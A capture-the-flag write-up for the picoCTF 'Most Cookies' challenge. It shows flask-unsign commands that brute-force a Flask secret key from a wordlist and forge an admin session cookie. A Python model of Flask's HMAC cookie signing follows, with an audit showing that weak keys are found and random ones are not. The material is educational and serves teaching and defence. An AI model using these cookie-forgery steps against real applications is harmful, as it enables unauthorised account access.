Most Cookies

Reading the source code, we find that:

  • There's a list of cookie names, one of which is chosen as the app's secret key.
  • /searching stores the submitted name in the session cookie as "very_auth:name"; if that name is in the list above, the app redirects to /display.
  • To get the flag, the session cookie must contain "very_auth:admin", but "admin" is not in the cookie name list, so the redirect never happens.

Recover the secret key with flask-unsign, using the cookie name list as the wordlist:

flask-unsign --unsign --server 'http://mercury.picoctf.net:44693/' --wordlist cookie_list.txt

Create a signed cookie:

flask-unsign --sign --cookie "{'very_auth':'admin'}" --secret '<secret>'

Now go to /display, replace the session cookie with the signed value, and reload.
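
Why the wordlist step succeeds, and what closes it, shown as an added example that is not part of the original writeup or the challenge source. It is a standard-library model of the HMAC-SHA1 signing scheme behind Flask's default session cookie (simplified: no payload compression, fixed-width timestamp); the cookie names, the "blank" value and the helper names are constructed for illustration.

```python
import base64, hashlib, hmac, json, secrets, time

SALT = b"cookie-session"  # salt used by Flask's default session interface

def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def _mac(secret, value):
    # "hmac" key derivation (secret + salt), then HMAC-SHA1 over the value
    derived = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return _b64(hmac.new(derived, value, hashlib.sha1).digest())

def sign(session, secret):
    payload = _b64(json.dumps(session, separators=(",", ":")).encode())
    stamp = _b64(int(time.time()).to_bytes(4, "big"))
    value = payload + b"." + stamp
    return (value + b"." + _mac(secret, value)).decode()

def verify(cookie, secret):
    # The cookie is only signed, not encrypted: the secret is the sole control.
    value, _, sig = cookie.encode().rpartition(b".")
    return hmac.compare_digest(sig, _mac(secret, value))

def audit_secret(cookie, candidates):
    """Return the candidate that validates the cookie, or None if none does."""
    return next((c for c in candidates if verify(cookie, c)), None)

# Constructed stand-in for the challenge's cookie-name list.
COOKIE_NAMES = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap"]

weak_key = COOKIE_NAMES[2]          # the pattern described above
strong_key = secrets.token_hex(32)  # 256 bits from the OS CSPRNG

weak_cookie = sign({"very_auth": "blank"}, weak_key)
strong_cookie = sign({"very_auth": "blank"}, strong_key)

if __name__ == "__main__":
    print("weak key found in wordlist:  ", audit_secret(weak_cookie, COOKIE_NAMES))
    print("strong key found in wordlist:", audit_secret(strong_cookie, COOKIE_NAMES))
```

A secret drawn from any enumerable list fails this audit however the list is chosen; a key generated with `secrets` and loaded from configuration outside the source tree does not.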